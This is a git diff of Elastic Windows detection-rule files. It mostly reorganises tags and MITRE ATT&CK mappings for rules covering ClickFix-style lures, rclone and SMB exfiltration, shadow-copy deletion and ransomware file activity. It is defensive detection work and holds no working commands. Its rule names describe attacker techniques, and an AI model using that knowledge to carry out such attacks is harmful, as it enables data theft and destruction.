Source: Windows Security Event Logs", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Elastic Endgame", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Windows Security Event Logs", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -149,36 +161,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml b/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml index da0f6bf4dc8..f2fdff5ae2b 100644 --- a/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml +++ b/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/19" [rule] author = ["Elastic"] @@ -57,7 +57,19 @@ note = """## Triage and analysis risk_score = 73 rule_id = "fbad57ec-4442-48db-a34f-5ee907b44a22" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Windows Security Event Logs", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Windows Security Event Logs", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -72,51 +84,61 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" [[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.004" -name = "Malicious Copy and Paste" -reference = "https://attack.mitre.org/techniques/T1204/004/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" \ No newline at end of file diff --git a/rules/windows/execution_windows_phish_clickfix.toml b/rules/windows/execution_windows_phish_clickfix.toml index ea6bea70489..499cedf6295 100644 --- a/rules/windows/execution_windows_phish_clickfix.toml +++ b/rules/windows/execution_windows_phish_clickfix.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/20" [rule] author = ["Elastic"] @@ -53,7 +53,20 @@ references = ["https://mrd0x.com/filefix-clickfix-alternative/"] risk_score = 73 rule_id = "7dc45430-7407-4790-b89e-c857c3f6bf23" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Windows Security Event Logs", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Data Source: Windows Security Event Logs", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -70,23 +83,61 @@ not (process.name : "rundll32.exe" and process.args : ("ndfapi.dll,NdfRunDllDiag [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" [[rule.threat.technique.subtechnique]] -id = "T1204.004" -name = "Malicious Copy and Paste" -reference = "https://attack.mitre.org/techniques/T1204/004/" +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/execution_windows_powershell_susp_args.toml b/rules/windows/execution_windows_powershell_susp_args.toml index 1678f421920..ff0cfea3021 100644 --- a/rules/windows/execution_windows_powershell_susp_args.toml +++ b/rules/windows/execution_windows_powershell_susp_args.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/06" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Elastic"] @@ -63,7 +63,20 @@ PowerShell is a powerful scripting language and command-line shell used for task risk_score = 47 rule_id = "83bf249e-4348-47ba-9741-1202a09556ad" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Windows Security Event Logs", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Windows Security Event Logs", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -173,31 +186,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/execution_windows_script_from_internet.toml b/rules/windows/execution_windows_script_from_internet.toml index 2f9e2dc686d..b0f8b6c40d2 100644 --- a/rules/windows/execution_windows_script_from_internet.toml +++ b/rules/windows/execution_windows_script_from_internet.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/31" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" min_stack_version = "9.1.0" min_stack_comments = "Changing min stack to 9.1.0, the latest minimum supported version for 9.X releases." @@ -20,7 +20,14 @@ name = "Execution of a Downloaded Windows Script" risk_score = 47 rule_id = "79543b00-28a5-4461-81ac-644c4dc4012f" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "eql" @@ -78,29 +85,6 @@ Windows scripts, often used for legitimate automation tasks, can be exploited by - Implement application whitelisting to restrict the execution of unauthorized scripts and scripting utilities, reducing the risk of similar threats in the future.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.005" -name = "Mshta" -reference = "https://attack.mitre.org/techniques/T1218/005/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.007" -name = "Msiexec" -reference = "https://attack.mitre.org/techniques/T1218/007/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" @@ -109,16 +93,6 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - [[rule.threat.technique.subtechnique]] id = "T1059.005" name = "Visual Basic" @@ -129,7 +103,37 @@ id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/exfiltration_rclone_cloud_upload.toml b/rules/windows/exfiltration_rclone_cloud_upload.toml index 0623bb45aa5..48377c25e27 100644 --- a/rules/windows/exfiltration_rclone_cloud_upload.toml +++ b/rules/windows/exfiltration_rclone_cloud_upload.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/18" [rule] author = ["Elastic"] @@ -84,17 +84,11 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1048" name = "Exfiltration Over Alternative Protocol" reference = "https://attack.mitre.org/techniques/T1048/" -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules/windows/exfiltration_smb_rare_destination.toml b/rules/windows/exfiltration_smb_rare_destination.toml index 4c2598205f8..1e007cf4c87 100644 --- a/rules/windows/exfiltration_smb_rare_destination.toml +++ b/rules/windows/exfiltration_smb_rare_destination.toml @@ -2,7 +2,7 @@ creation_date = "2023/12/04" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -61,7 +61,18 @@ references = ["https://www.securify.nl/en/blog/living-off-the-land-stealing-netn risk_score = 47 rule_id = "f580bf0a-2d23-43bb-b8e1-17548bb947ec" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -106,16 +117,17 @@ event.category:network and host.os.type:windows and process.pid:4 and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1187" -name = "Forced Authentication" -reference = "https://attack.mitre.org/techniques/T1187/" +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + [rule.new_terms] field = "new_terms_fields" value = ["destination.ip"] diff --git a/rules/windows/impact_backup_file_deletion.toml b/rules/windows/impact_backup_file_deletion.toml index 18ea2498d68..445c8897378 100644 --- a/rules/windows/impact_backup_file_deletion.toml +++ b/rules/windows/impact_backup_file_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/01" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/27" [rule] author = ["Elastic"] @@ -107,13 +107,19 @@ file where host.os.type == "windows" and event.type == "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml b/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml index 680f7b7dad8..8c1e77cc3b5 100644 --- a/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml +++ b/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/09" [rule] author = ["Elastic"] @@ -93,13 +93,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/windows/impact_high_freq_file_renames_by_kernel.toml b/rules/windows/impact_high_freq_file_renames_by_kernel.toml index ef82bc6c119..e2d3edbbce1 100644 --- a/rules/windows/impact_high_freq_file_renames_by_kernel.toml +++ b/rules/windows/impact_high_freq_file_renames_by_kernel.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -54,7 +54,14 @@ references = ["https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomwa risk_score = 47 rule_id = "1397e1b9-0c90-4d24-8d7b-80598eb9bc9a" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" +] timestamp_override = "event.ingested" type = "esql" @@ -79,25 +86,22 @@ from logs-endpoint.events.file-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1486" -name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" @@ -107,3 +111,5 @@ reference = "https://attack.mitre.org/techniques/T1021/002/" id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + + diff --git a/rules/windows/impact_mod_critical_os_files.toml b/rules/windows/impact_mod_critical_os_files.toml index 96426b8ec98..7aa911b6309 100644 --- a/rules/windows/impact_mod_critical_os_files.toml +++ b/rules/windows/impact_mod_critical_os_files.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/01" [rule] author = ["Elastic"] @@ -55,7 +55,20 @@ This rule identifies attempts to delete or modify critical files used during the risk_score = 73 rule_id = "1a3f2a4c-12d0-4b88-961a-2711ee295637" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Impact", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -80,23 +93,18 @@ file where host.os.type == "windows" and event.type in ("change", "deletion") an [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" - [[rule.threat.technique]] -id = "T1565" -name = "Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/" +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" -[[rule.threat.technique.subtechnique]] -id = "T1565.001" -name = "Stored Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/windows/impact_ransomware_file_rename_smb.toml b/rules/windows/impact_ransomware_file_rename_smb.toml index 7134610ebc1..7f585c29ae5 100644 --- a/rules/windows/impact_ransomware_file_rename_smb.toml +++ b/rules/windows/impact_ransomware_file_rename_smb.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/14" [rule] author = ["Elastic"] @@ -55,7 +55,14 @@ references = ["https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomwa risk_score = 73 rule_id = "78e9b5d5-7c07-40a7-a591-3dbbf464c386" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "eql" @@ -75,31 +82,36 @@ sequence by host.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] -id = "T1486" -name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/impact_ransomware_note_file_over_smb.toml b/rules/windows/impact_ransomware_note_file_over_smb.toml index e37debd4886..392a87fdba2 100644 --- a/rules/windows/impact_ransomware_note_file_over_smb.toml +++ b/rules/windows/impact_ransomware_note_file_over_smb.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/14" [rule] author = ["Elastic"] @@ -55,7 +55,14 @@ note = """## Triage and analysis risk_score = 73 rule_id = "02bab13d-fb14-4d7c-b6fe-4a28874d37c5" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "eql" @@ -75,31 +82,36 @@ sequence by host.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] -id = "T1486" -name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml index ea585c8adc0..073eef3b42a 100644 --- a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml +++ b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic", "Austin Songer"] @@ -118,31 +118,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1490" -name = "Inhibit System Recovery" -reference = "https://attack.mitre.org/techniques/T1490/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml index 16078000044..3298b577ca8 100644 --- a/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml +++ b/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -112,26 +112,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1490" -name = "Inhibit System Recovery" -reference = "https://attack.mitre.org/techniques/T1490/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml index 5fa8548e79a..83b0ab0edd9 100644 --- a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml +++ b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" 